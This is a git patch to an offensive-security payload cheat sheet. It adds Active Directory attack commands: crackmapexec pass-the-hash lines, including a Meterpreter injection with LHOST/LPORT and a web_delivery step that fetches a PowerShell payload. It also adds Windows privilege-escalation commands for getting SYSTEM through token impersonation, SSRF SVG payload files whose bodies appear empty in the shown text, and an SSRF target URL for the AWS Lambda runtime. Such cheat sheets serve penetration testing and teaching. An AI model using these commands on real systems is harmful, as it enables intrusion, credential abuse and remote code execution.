From b6697d859570803e55cff6a68d4d6827b2126788 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 15 Aug 2019 18:21:06 +0200 Subject: [PATCH] SSRF SVG + Windows Token getsystem --- .../Active Directory Attack.md | 8 +++++--- .../Windows - Privilege Escalation.md | 11 +++++++++++ .../Files/ssrf_svg_css_import.svg | 7 +++++++ .../Files/ssrf_svg_css_link.svg | 6 ++++++ .../Files/ssrf_svg_css_xmlstylesheet.svg | 6 ++++++ .../Files/ssrf_svg_image.svg | 4 ++++ .../Files/ssrf_svg_use.svg | 4 ++++ Server Side Request Forgery/README.md | 15 ++++++++++++++- 8 files changed, 57 insertions(+), 4 deletions(-) create mode 100644 Server Side Request Forgery/Files/ssrf_svg_css_import.svg create mode 100644 Server Side Request Forgery/Files/ssrf_svg_css_link.svg create mode 100644 Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg create mode 100644 Server Side Request Forgery/Files/ssrf_svg_image.svg create mode 100644 Server Side Request Forgery/Files/ssrf_svg_use.svg diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 6dae309..7a1cfc6 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -55,6 +55,7 @@ crackmapexec smb -M name_module -o VAR=DATA crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares + crackmapexec 192.168.1.100 -u Jaddmon -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" @@ -170,13 +171,13 @@ mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" :warning: If the clock is skewed use `clock-skew.nse` script from `nmap` ```powershell -$ nmap -sV -sC 10.10.10.10 +Linux> $ nmap -sV -sC 10.10.10.10 clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s -$ sudo date -s "14 APR 2015 18:25:16" +Linux> sudo date -s "14 APR 2015 18:25:16" +Windows> net time /domain /set ``` - ### Open Shares ```powershell @@ -230,6 +231,7 @@ Mount a share ```powershell smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw +sudo mount -t cifs -o username=,password= ///Users folder ``` ### GPO - Pivoting with Local Admin & Passwords in SYSVOL diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 357f3c1..12f24dc 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -18,6 +18,7 @@ * [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system) * [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts) * [EoP - Impersonation Privileges](#eop---impersonation-privileges) + * [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives) * [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation) * [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges) * [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure) @@ -662,6 +663,16 @@ Microsoft.Workflow.Compiler.exe tests.xml results.xml ## EoP - Impersonation Privileges +### Meterpreter getsystem and alternatives + +```powershell +meterpreter> getsystem +Tokenvator.exe getsystem cmd.exe +incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe +psexec -s -i cmd.exe +python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc +``` + ### RottenPotato (Token Impersonation) Binary available at : https://github.com/foxglovesec/RottenPotato diff --git a/Server Side Request Forgery/Files/ssrf_svg_css_import.svg b/Server Side Request Forgery/Files/ssrf_svg_css_import.svg new file mode 100644 index 0000000..8c1f446 --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_css_import.svg @@ -0,0 +1,7 @@ + + + + \ No newline at end of file diff --git a/Server Side Request Forgery/Files/ssrf_svg_css_link.svg b/Server Side Request Forgery/Files/ssrf_svg_css_link.svg new file mode 100644 index 0000000..e9f7d30 --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_css_link.svg @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git a/Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg b/Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg new file mode 100644 index 0000000..a29199a --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git a/Server Side Request Forgery/Files/ssrf_svg_image.svg b/Server Side Request Forgery/Files/ssrf_svg_image.svg new file mode 100644 index 0000000..9d3b717 --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_image.svg @@ -0,0 +1,4 @@ + + + \ No newline at end of file diff --git a/Server Side Request Forgery/Files/ssrf_svg_use.svg b/Server Side Request Forgery/Files/ssrf_svg_use.svg new file mode 100644 index 0000000..14040b2 --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_use.svg @@ -0,0 +1,4 @@ + + + \ No newline at end of file diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 9a7032a..1f0368a 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -32,6 +32,7 @@ * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances) * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket) * [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk) + * [SSRF URL for AWS Lambda](#ssrf-url-for-aws-lambda) * [SSRF URL for Google Cloud](#ssrf-url-for-google-cloud) * [SSRF URL for Digital Ocean](#ssrf-url-for-digital-ocean) * [SSRF URL for Packetcloud](#ssrf-url-for-packetcloud) @@ -441,6 +442,17 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`. +### SSRF URL for AWS Lambda + +AWS Lambda provides an HTTP API for custom runtimes to receive invocation events from Lambda and send response data back within the Lambda execution environment. + +```powershell +http://localhost:9001/2018-06-01/runtime/invocation/next +$ curl "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" +``` + +Docs: https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html#runtimes-api-next + ### SSRF URL for Google Cloud Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" @@ -631,4 +643,5 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/) - [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) - [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/) -- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf) \ No newline at end of file +- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf) +- [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet) \ No newline at end of file